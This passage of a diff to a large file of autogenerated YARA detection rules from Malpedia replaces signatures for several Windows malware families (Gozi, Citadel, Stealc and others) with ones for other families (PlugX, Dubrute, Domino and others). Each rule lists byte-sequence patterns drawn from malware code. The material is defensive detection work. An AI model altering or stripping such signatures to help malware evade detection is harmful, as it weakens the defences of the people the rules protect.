+		$sequence_9 = { 899424e8010000 89b424e8000000 899424e4000000 33c0 8d8c24e8000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Rover_Auto : FILE
+rule MALPEDIA_Win_Mole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eae2ea54-1e52-5b6a-97b9-e0561a756b46"
+		id = "6fb57925-5672-50fa-ac3a-bb409269cd91"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rover_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mole_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "57f684b21a109064243739f52fd53044ef32fd5681c182556fe356fe4b7b3140"
+		logic_hash = "d2300b61acf948bdcbf42bf1210c281241845787d88efeb1407824c182f5bb45"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88105,32 +88287,32 @@ rule MALPEDIA_Win_Rover_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 eb76 83bb9802000000 7504 33c0 eb69 }
-		$sequence_1 = { 33c0 eb05 1bc0 83d8ff 85c0 0f84a3020000 8d8424bc000000 }
-		$sequence_2 = { 0f95c1 33c0 898e80020000 8b97f0020000 8996a0020000 398704040000 0f95c0 }
-		$sequence_3 = { 83c8ff 8b4c2450 64890d00000000 59 5e 5b 8b4c2440 }
-		$sequence_4 = { 89870c030000 3bc3 0f854bfcffff 5b 5f 5e b81b000000 }
-		$sequence_5 = { 751f 5f c6860301000001 5e 5d b801000000 5b }
-		$sequence_6 = { 396c245c 7508 c744245c22a14400 396e0c 7428 }
-		$sequence_7 = { d1c6 83f905 72d9 8b4c2410 8b19 895c2410 85db }
-		$sequence_8 = { 50 e8???????? 83c408 85c0 0f85bc010000 8d4c247c 894c240c }
-		$sequence_9 = { 8be8 83c408 85ed 743d 45 6a3a 55 }
+		$sequence_0 = { 52 ff15???????? 8d85dcfdffff 50 e8???????? 83c404 0fb6c8 }
+		$sequence_1 = { 6a75 8b95c8eeffff 52 e8???????? 83c410 8d85cceeffff }
+		$sequence_2 = { 81bdf0fdffff2e6b9338 7735 81bdf0fdffff2e6b9338 0f843a3f0000 81bdf0fdffffa3a57438 0f8444340000 }
+		$sequence_3 = { 0f84002c0000 e9???????? 81bdf0fdffff5261f1ea 0f84b9210000 81bdf0fdffff4769f2ea 0f849d140000 }
+		$sequence_4 = { 81bdf0fdffffd4a90b00 0f846b800000 e9???????? 81bdf0fdffff4daa0b00 0f845e730000 81bdf0fdffff4eaa0b00 }
+		$sequence_5 = { 8d85ace4ffff 50 6a05 68???????? 8b8dc4e4ffff 51 ff15???????? }
+		$sequence_6 = { e9???????? 81bdf0fdffff46e1d405 7776 81bdf0fdffff46e1d405 0f847b490000 81bdf0fdffffc9e0d405 7735 }
+		$sequence_7 = { ebd3 8bc6 c1f805 83e61f 8b048578f64100 c1e606 80643004fd }
+		$sequence_8 = { c7465c907a4100 83660800 33ff 47 897e14 897e70 6a43 }
+		$sequence_9 = { ff15???????? 85c0 7507 33c0 e9???????? 8d55fc }
 
 	condition:
-		7 of them and filesize < 704512
+		7 of them and filesize < 297984
 }
-rule MALPEDIA_Win_Xpertrat_Auto : FILE
+rule MALPEDIA_Win_Dubrute_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e49e4f10-4f24-5d5f-a0ba-93859bc43e3e"
+		id = "68b59ace-0878-598c-a753-f65c82412bdf"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xpertrat_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dubrute_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "0756c58d6846e1ce6d5f3a4d4ce8c4c63505cae3368973abe64928b289231578"
+		logic_hash = "17213bc1a7d95fe150fe5455d2618ba3abfef4592455b4788ecd90ee42a9b6b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88144,38 +88326,32 @@ rule MALPEDIA_Win_Xpertrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff08 40 0430 ff0a 4c 000c00 }
-		$sequence_1 = { 0d98000700 6e 74ff 6e }
-		$sequence_2 = { 0000 00a1cc004400 0bc0 7402 ffe0 68???????? b8???????? }
-		$sequence_3 = { 008a3800cc1c 5e 006c70ff 0808 }
-		$sequence_4 = { 0870ff 0d80000700 0474 ff0478 }
-		$sequence_5 = { ff05???????? 000d???????? 0878ff 0d98000700 6e }
-		$sequence_6 = { 006c70ff 0808 008f38001b26 001b 0d002a2364 ff08 }
-		$sequence_7 = { 007168 ff0468 ff0a 250004003c 6c 70ff 0808 }
-		$sequence_8 = { ff15???????? 6a00 6a05 6a01 8d55b4 6a00 }
-		$sequence_9 = { ff15???????? 6a00 68fbfdffff 8b06 }
-		$sequence_10 = { ff15???????? 6a00 6a05 56 ff15???????? 83c40c 33db }
-		$sequence_11 = { ff15???????? 6a00 6a01 6a01 8d45b4 6a00 }
-		$sequence_12 = { ff15???????? 6a00 6a04 8b4510 }
-		$sequence_13 = { ff15???????? 6a00 68???????? 8d4dcc }
-		$sequence_14 = { ff15???????? 6a00 6a02 56 }
-		$sequence_15 = { ff15???????? 6a00 6a00 6a01 6a03 }
+		$sequence_0 = { 8d3489 c1e603 8bc6 034744 8b5020 85d2 }
+		$sequence_1 = { 51 53 56 33f6 57 39750c ff7518 }
+		$sequence_2 = { ff36 834df0ff 8975f4 895df8 68???????? e8???????? 59 }
+		$sequence_3 = { e8???????? 83c410 6a02 58 eb96 8b460c 85c0 }
+		$sequence_4 = { 8b06 c1e908 8808 ff06 8b06 8bcb c1e908 }
+		$sequence_5 = { 8a4601 c1e008 0bc2 0fb65603 c1e008 0bc2 eb0c }
+		$sequence_6 = { 85c0 59 0f84a8000000 8b4d0c 8906 034604 3b4df4 }
+		$sequence_7 = { 8d45a4 8d4d0c 50 ffd6 8b35???????? 8d4514 6a01 }
+		$sequence_8 = { a1???????? 8d4e20 ff30 8d4720 53 50 ff15???????? }
+		$sequence_9 = { eb09 8b4304 89450c 8d450c 8b08 8b4508 5f }
 
 	condition:
-		7 of them and filesize < 8560640
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Royal_Dns_Auto : FILE
+rule MALPEDIA_Win_Pseudo_Manuscrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5169d1d0-659d-5d51-8aba-541d3872a32b"
+		id = "42bd2b8b-9456-5653-89f8-7f91defd35ef"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.royal_dns_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pseudo_manuscrypt_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "4810e30179da8cf300ac6b9d2a5829b8b65ed7f8312156b3af4aea162299d11c"
+		logic_hash = "cbfecfd1106bc0d6ac7282a9292b2494a3e1d213712be19f881b75451b2a5e68"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88189,32 +88365,32 @@ rule MALPEDIA_Win_Royal_Dns_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 83bd80f1ffff05 7c12 8b8d7cf1ffff 51 ff15???????? }
-		$sequence_1 = { 83c004 8985e8faffff 3bc1 0f8725010000 }
-		$sequence_2 = { ffd6 68???????? 8d95f0fdffff 52 ffd6 57 8d85f0fdffff }
-		$sequence_3 = { 75f9 8b4dfc 2bc2 8d540801 8b45f8 8910 }
-		$sequence_4 = { 0f84ad010000 83f8ff 0f84a4010000 85c0 0f849c010000 }
-		$sequence_5 = { 56 8d85e8fdffff 68???????? 50 e8???????? 83c40c 8d8df0feffff }
-		$sequence_6 = { 8d95d8fcffff 6a00 52 e8???????? 0fb6730c }
-		$sequence_7 = { 53 6a00 6800040000 8d85f4fbffff c785dcfaffff10000000 }
-		$sequence_8 = { 8b4608 52 83c00c 50 83c711 57 e8???????? }
-		$sequence_9 = { be50000000 56 51 8d95d9feffff 52 }
+		$sequence_0 = { 50 8d45ec 50 68???????? 56 e8???????? 83c420 }
+		$sequence_1 = { 85c0 747c 6a0d ff15???????? 85c0 746a 53 }
+		$sequence_2 = { 689c000000 81c684000000 6a00 ff36 ff15???????? 8bf8 }
+		$sequence_3 = { 7513 ffb518f7ffff ffd6 fec3 80fb7a 0f8e68ffffff 8b35???????? }
+		$sequence_4 = { 83ec08 a1???????? 33c5 8945fc 56 8bf1 83be9c02000000 }
+		$sequence_5 = { 42 8841ff 3b550c 72ef e9???????? b8d34d6210 f7eb }
+		$sequence_6 = { 85f6 7e16 8bce e8???????? 8bd6 8d8d34ffffff e8???????? }
+		$sequence_7 = { e8???????? 85c0 0f8517010000 56 50 8b4614 ff30 }
+		$sequence_8 = { 8910 8b45f4 83f808 720a 40 50 ff75e0 }
+		$sequence_9 = { 6a06 6a01 50 ff15???????? 8bc8 894e1c 83f9ff }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_Gopuram_Auto : FILE
+rule MALPEDIA_Win_Eagerbee_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d1cf207-19a7-572a-8ca5-3e711cdc3ad9"
+		id = "2914e030-5e45-5c35-a3c7-d9acb5cc0ce1"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gopuram_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eagerbee_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "9c847639dd3b37832d4dad79157d5016a8deee4fa6901036c6568baf2f1743d6"
+		logic_hash = "3bba3fefff572c4fd61435a0b0fa92dfc257235bdf724d5d11ca53b01740914f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88228,34 +88404,34 @@ rule MALPEDIA_Win_Gopuram_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd5 498bcf e8???????? 8bf0 85f6 0f8493020000 498b8e20010000 }
-		$sequence_1 = { 448b64244c b801000000 4c895d88 4403e0 88442435 eb0a 448b64244c }
-		$sequence_2 = { 488bc8 e8???????? e9???????? 488b0d???????? 488b01 ff90f8000000 83f804 }
-		$sequence_3 = { e8???????? 8bc3 488b4d40 4833cc e8???????? 4c8d9c2450010000 498b5b38 }
-		$sequence_4 = { c744243800000000 e8???????? 4885c0 740f 488b4b10 488d542438 488b01 }
-		$sequence_5 = { c705????????03400080 c705????????f4060780 890d???????? c705????????09000380 33c0 3b7efc 7509 }
-		$sequence_6 = { 8b4708 894114 8b470c 894118 448bfb 49c1e705 4d03fe }
-		$sequence_7 = { 85c0 7508 41be02400080 ebd2 be01000000 33db 448be6 }
-		$sequence_8 = { b908000000 668908 83bb9800000000 0f850b010000 488b0d???????? 488b01 ff9020010000 }
-		$sequence_9 = { 85ed 0f89b1010000 0f1005???????? 4c8b05???????? 488d542460 41b902000000 b907010000 }
+		$sequence_0 = { 488b5510 488b4b38 4c8bc7 482bd7 e8???????? }
+		$sequence_1 = { 498b4310 410fb7c8 66f7d1 66c1e908 880c02 41ff4328 458b4b28 }
+		$sequence_2 = { 498980b0010000 c68424a000000057 c68424a100000053 c68424a200000041 c68424a300000053 c68424a400000074 c68424a500000061 }
+		$sequence_3 = { 488364242000 b8fffe0000 4c8d4c2444 488d542440 41b802000000 488bcb 6689442440 }
+		$sequence_4 = { c787cc00000001000000 c787c800000001000000 e8???????? 488b05???????? }
+		$sequence_5 = { ff15???????? 85c0 750e 035c2448 4863f3 4803f7 c646ff5f }
+		$sequence_6 = { 8bc3 eb3b 4d85e4 7408 498bcc }
+		$sequence_7 = { 483bc3 750d ff15???????? 33c0 e9???????? 48895c2430 488d8424c0100000 }
+		$sequence_8 = { c787ac00000006000000 498d0443 89b7b0000000 c6473c08 488987f8160000 498d044b }
+		$sequence_9 = { 8b8c3888000000 41b801000000 488bd7 e8???????? 8bf0 837c3e1800 }
 
 	condition:
-		7 of them and filesize < 1591296
+		7 of them and filesize < 422912
 }
-rule MALPEDIA_Win_Gozi_Auto : FILE
+rule MALPEDIA_Win_Billgates_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aac9b6f0-8c81-5a6b-8a62-7eb8449e0397"
+		id = "ce6a49fc-09dc-5429-91ef-444e27e6a6e2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gozi_auto.yar#L1-L301"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.billgates_auto.yar#L1-L111"
 		license_url = "N/A"
-		logic_hash = "6d080496b0bc709b18cae762326b65ba3fe68298a3c52833320cbdca2a2db665"
+		logic_hash = "7ac006802cc67c455b1cfb751cff616e1942e0354815f2ae842e0537d44fc0dd"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88267,54 +88443,32 @@ rule MALPEDIA_Win_Gozi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b4dfc 73df 33c0 5e c9 c21000 }
-		$sequence_1 = { 0e 96 3b5375 60 }
-		$sequence_2 = { 48 fb 5c 3c32 7e02 }
-		$sequence_3 = { 894508 eb03 897d08 bf???????? 57 }
-		$sequence_4 = { 0bc0 7408 60 50 e8???????? 61 }
-		$sequence_5 = { 7061 63743200 c808bf35 6963c03caff3da c9 50 0c73 }
-		$sequence_6 = { 8b450c 03f0 8b4e0c 85c9 8975e8 0f8453010000 }
-		$sequence_7 = { 0faff1 c7458804000000 a1???????? 8b0d???????? 6a00 68f80a0000 }
-		$sequence_8 = { 7e02 19c1 a6 3327 72e7 3ebb4a68d947 }
-		$sequence_9 = { e8???????? 8945fc 6805010000 6a40 }
-		$sequence_10 = { 8b45fc 8b08 6a00 50 ff91a4000000 33c9 85c0 }
-		$sequence_11 = { 3a56b9 036890 2b02 9a102a6715fb53 }
-		$sequence_12 = { 0ad0 4a 0fca 8af4 0fbdf1 0fbaf6be }
-		$sequence_13 = { ad b710 2dc7ce5bbb d6 b6c6 e8???????? 6af4 }
-		$sequence_14 = { 33c0 ebf7 56 8b74240c 57 }
-		$sequence_15 = { 7708 8b4df8 e8???????? 837d0c00 766f 8b4df8 }
-		$sequence_16 = { 55 8bec 83c4fc 53 837d0c4a }
-		$sequence_17 = { 50 0c73 0e 96 }
-		$sequence_18 = { e8???????? 8985b0feffff 8d8dbcfeffff 51 56 ffd0 85c0 }
-		$sequence_19 = { ffd0 8345e404 ebe6 c745e0d4814300 817de0d8814300 }
-		$sequence_20 = { 1da2c9dde2 f4 16 ee 7f7b 36110b 33745571 }
-		$sequence_21 = { 8b45d0 833800 755d 6a18 e8???????? }
-		$sequence_22 = { eb15 c745f0ffffffff 6a04 8d45f0 50 }
-		$sequence_23 = { 8b4dfc 8b09 85c9 0f84d7000000 }
-		$sequence_24 = { ff45f0 48 8816 75ee }
-		$sequence_25 = { 0fadce d2ee 84e5 8af4 0fbdf1 }
-		$sequence_26 = { 56 8d45fc 50 6a08 33f6 ff15???????? }
-		$sequence_27 = { b636 0fafd5 80cafa 69f1eef9d83b 8ad0 }
-		$sequence_28 = { 0fbdf1 b67e d2ca f6de }
-		$sequence_29 = { 730d 898c85b0feffff ff85acfeffff 899da0feffff 33c0 8dbda4feffff ab }
-		$sequence_30 = { ff15???????? 8bd8 3bde 895d64 }
-		$sequence_31 = { 53 c705????????00000000 68???????? 6a01 }
+		$sequence_0 = { 3c78 7404 3c58 7507 b802000000 eb02 }
+		$sequence_1 = { 740c 3c11 7408 3c22 }
+		$sequence_2 = { 3c10 740c 3c11 7408 }
+		$sequence_3 = { 3c58 7507 b802000000 eb02 }
+		$sequence_4 = { 8d8809f9ffff b8c94216b2 f7e9 03d1 }
+		$sequence_5 = { 3c10 740c 3c11 7408 3c22 7404 3c30 }
+		$sequence_6 = { 3c11 7408 3c22 7404 }
+		$sequence_7 = { 3c21 7408 3c23 7404 3c24 }
+		$sequence_8 = { 7404 3c58 7507 b802000000 eb02 }
+		$sequence_9 = { 7408 3c23 7404 3c24 }
 
 	condition:
-		7 of them and filesize < 568320
+		7 of them and filesize < 801792
 }
-rule MALPEDIA_Win_Btcware_Auto : FILE
+rule MALPEDIA_Win_Dexbia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0a15c264-44c4-5125-8666-5205c4d8e175"
+		id = "d4032cc9-0c2b-5612-9b25-c1c6f50e458e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.btcware_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dexbia_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "f2d147920cfa04deca980bc5278a317aec1f05504da7229422f4351e420db59d"
+		logic_hash = "1dcaac0ec64ac5a8c76c0fa411e7e39bdabd41113089ec01c21fddb197f9dd6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88328,34 +88482,34 @@ rule MALPEDIA_Win_Btcware_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 8b857cffffff c7459000000000 c745940f000000 c6458000 }
-		$sequence_1 = { 6bc930 8b048540d04100 0fb6440828 83e040 5d c3 }
-		$sequence_2 = { ff75e4 ff15???????? 8d45ec 50 6a01 ff75e4 6810660000 }
-		$sequence_3 = { e8???????? a1???????? 40 3d00100000 722a f6c11f 0f85366fffff }
-		$sequence_4 = { 5d c3 8d44241c c7442414ffffffff 50 8d442424 c744242000800000 }
-		$sequence_5 = { 8be5 5d c21000 8b8c2494040000 33c0 5f }
-		$sequence_6 = { 8855ee 0f1f840000000000 8b4610 8b4e14 }
-		$sequence_7 = { ffd3 33d2 33c9 e8???????? 8b35???????? a1???????? }
-		$sequence_8 = { c78564ffffff0f000000 c68550ffffff00 83f810 7245 8b8d38ffffff }
-		$sequence_9 = { 833d????????10 bba0fc8101 a1???????? 0f431d???????? 8a4c3df0 85c0 7416 }
+		$sequence_0 = { 8bcb 8d442410 83e103 50 f3a4 68???????? ff15???????? }
+		$sequence_1 = { b85c140000 e8???????? 55 56 57 }
+		$sequence_2 = { 33c0 83c40c f2ae f7d1 2bf9 8d54247c 8bf7 }
+		$sequence_3 = { f3a5 8bca 83c020 83e103 8d9424a0120000 f3a4 }
+		$sequence_4 = { 68???????? f3ab 8b0d???????? 66ab aa }
+		$sequence_5 = { 51 68???????? 68???????? 68???????? e8???????? 83c428 85c0 }
+		$sequence_6 = { c786a801000000000000 8d8ef8000000 8d9638010000 51 52 e8???????? }
+		$sequence_7 = { ff248579354000 834df0ff 8955cc 8955d8 8955e0 }
+		$sequence_8 = { 8be8 85ed 7522 ff15???????? 8b35???????? 53 ffd6 }
+		$sequence_9 = { f3ab 66ab aa 8b442410 b908000000 8dbc249c120000 6800140000 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Citadel_Auto : FILE
+rule MALPEDIA_Win_Plugx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b395dca4-452f-5377-80bb-408553de53db"
+		id = "3f86c5a3-fd23-59bc-bcb0-3d1decf01c2c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.citadel_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plugx_auto.yar#L1-L291"
 		license_url = "N/A"
-		logic_hash = "19150147fccb12d09c7c4bd60b0305f74a8937d98e638616a5c6d14e1a34b56b"
+		logic_hash = "15190bb8aae3c81242a3f62c3118fe86de191513b0096b3d3022dcd142f4bd88"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88367,38 +88521,55 @@ rule MALPEDIA_Win_Citadel_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb0e 6800800000 53 57 }
-		$sequence_1 = { 03f7 6a0d 5f e8???????? }
-		$sequence_2 = { 3d00002003 7715 8b4d08 890e 895604 895e0c }
-		$sequence_3 = { ff15???????? 85c0 0f8566010000 57 57 57 57 }
-		$sequence_4 = { 41 66395802 7405 83c002 }
-		$sequence_5 = { 33c9 663918 7507 41 }
-		$sequence_6 = { 50 57 e8???????? 33db 3c01 }
-		$sequence_7 = { a1???????? 57 e8???????? 8945fc 3bc3 }
-		$sequence_8 = { 3ac3 73fa 0fb6c0 8b44c104 e9???????? d0e9 }
-		$sequence_9 = { 0f85a0000000 33c0 85c0 7409 }
-		$sequence_10 = { 8a4e01 ffd0 884601 33c0 6689460c }
-		$sequence_11 = { fec8 32d0 8ac2 3245fe 85c9 7408 84db }
-		$sequence_12 = { 85c0 740b 8a5608 8a4e02 }
-		$sequence_13 = { 763c 8a06 2a45ff 8a5602 }
-		$sequence_14 = { 0fb6c9 8b04c8 eb81 d0e9 }
-		$sequence_15 = { e9???????? d0e9 3aca 73fa 0fb6c9 8b04c8 }
+		$sequence_0 = { 51 56 57 6a1c 8bf8 e8???????? 8bf0 }
+		$sequence_1 = { 41 3bca 7ce0 3bca }
+		$sequence_2 = { 56 8b750c 8b4604 050070ffff }
+		$sequence_3 = { 33d2 f7f3 33d2 8945fc }
+		$sequence_4 = { 55 8bec 8b450c 81780402700000 }
+		$sequence_5 = { 51 53 6a00 6a00 6a02 ffd0 85c0 }
+		$sequence_6 = { 0145f4 8b45fc 0fafc3 33d2 }
+		$sequence_7 = { 50 ff15???????? a3???????? 8b4d18 }
+		$sequence_8 = { e8???????? 3de5030000 7407 e8???????? }
+		$sequence_9 = { e8???????? 85c0 7508 e8???????? 8945fc }
+		$sequence_10 = { 85c0 7413 e8???????? 3de5030000 }
+		$sequence_11 = { e8???????? 85c0 7407 b84f050000 }
+		$sequence_12 = { 6a00 6a00 6a04 6a00 6a01 6800000040 57 }
+		$sequence_13 = { e8???????? 85c0 750a e8???????? 8945fc }
+		$sequence_14 = { 85c0 750d e8???????? 8945f4 }
+		$sequence_15 = { 51 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 }
+		$sequence_16 = { 6819000200 6a00 6a00 6a00 51 }
+		$sequence_17 = { 57 e8???????? eb0c e8???????? }
+		$sequence_18 = { 81ec90010000 e8???????? e8???????? e8???????? }
+		$sequence_19 = { 68???????? e8???????? 6800080000 68???????? e8???????? }
+		$sequence_20 = { 50 56 ffb42480000000 ff15???????? }
+		$sequence_21 = { 89742434 89f1 8b442434 e8???????? }
+		$sequence_22 = { 89442424 8b442424 6808020000 6a00 }
+		$sequence_23 = { 6a02 6a00 e8???????? c705????????00000000 }
+		$sequence_24 = { 5d c21000 55 53 57 56 83ec18 }
+		$sequence_25 = { 6a00 6a00 6a01 6a00 e8???????? a3???????? 6800080000 }
+		$sequence_26 = { 6808020000 6a00 ff74242c e8???????? 83c40c }
+		$sequence_27 = { 50 ff75e8 6802000080 e8???????? }
+		$sequence_28 = { 50 6802000080 53 e8???????? }
+		$sequence_29 = { 68000000a0 6aff ffb424c8000000 ff74241c }
+		$sequence_30 = { 6808020000 6a00 ff74245c e8???????? }
+		$sequence_31 = { 6a5c ff74241c e8???????? 83c408 }
+		$sequence_32 = { 5e 5f 5b 5d c20400 50 64a118000000 }
 
 	condition:
-		7 of them and filesize < 1236992
+		7 of them and filesize < 1284096
 }
-rule MALPEDIA_Win_Stealc_Auto : FILE
+rule MALPEDIA_Win_Domino_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9a3385f-b9f5-5cec-b139-7fd9ab3e38ee"
+		id = "5d360219-88f3-51b6-b0a7-8c0e8e115450"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.stealc_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.domino_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "1bbc82a373b409e3dad4afed525c9d3527cdf24f15e799642d4692134ce52442"
+		logic_hash = "0494b0021734ccd5b5bbf5e2e5a90aaa191fbeb0b0a8f17de8e34620de4c33b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88412,32 +88583,32 @@ rule MALPEDIA_Win_Stealc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c460 e8???????? 83c40c }
-		$sequence_1 = { ff15???????? 85c0 7507 c685e0feffff43 }
-		$sequence_2 = { e8???????? e8???????? 83c418 6a3c }
-		$sequence_3 = { 50 e8???????? e8???????? 83c474 }
-		$sequence_4 = { e8???????? e8???????? 81c480000000 e9???????? }
-		$sequence_5 = { 68???????? e8???????? e8???????? 83c474 }
-		$sequence_6 = { 50 e8???????? e8???????? 81c484000000 }
-		$sequence_7 = { 8d45fc 50 ff75f4 e8???????? 59 59 8d85f0feffff }
-		$sequence_8 = { b9e8030000 33c0 f3aa 8d850ca5ffff 8945fc 8b7dfc b9e8030000 }
-		$sequence_9 = { 8d75f4 e8???????? 8b45d0 e8???????? 8d7de8 8d75d0 }
+		$sequence_0 = { 7514 66c7030209 e9???????? 66c7030208 }
+		$sequence_1 = { 448bc5 488bd6 488bf8 ff15???????? }
+		$sequence_2 = { 84c0 750f 66c7030101 b802000000 e9???????? 488d942450010000 }
+		$sequence_3 = { ff15???????? eb34 ff15???????? 488bd7 b940000000 }
+		$sequence_4 = { 72ce 66c7030102 33c0 41c7042402000000 488b5c2458 }
+		$sequence_5 = { 56 57 4156 4883ec30 498bd8 4863f2 488bf9 }
+		$sequence_6 = { ff15???????? 85c0 741a 488b4c2458 }
+		$sequence_7 = { 4889442420 e8???????? 85c0 742e 33db }
+		$sequence_8 = { 48896c2410 4889742420 57 4881ec60020000 }
+		$sequence_9 = { 4c89742420 89757f ff15???????? f7d8 1bdb 235d7f }
 
 	condition:
-		7 of them and filesize < 4891648
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Funny_Dream_Auto : FILE
+rule MALPEDIA_Win_Kdcsponge_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f51b37f-d046-5620-bc19-e2253f913b87"
+		id = "93fd80a3-a643-5f56-b47f-f9e7f12c352c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream"
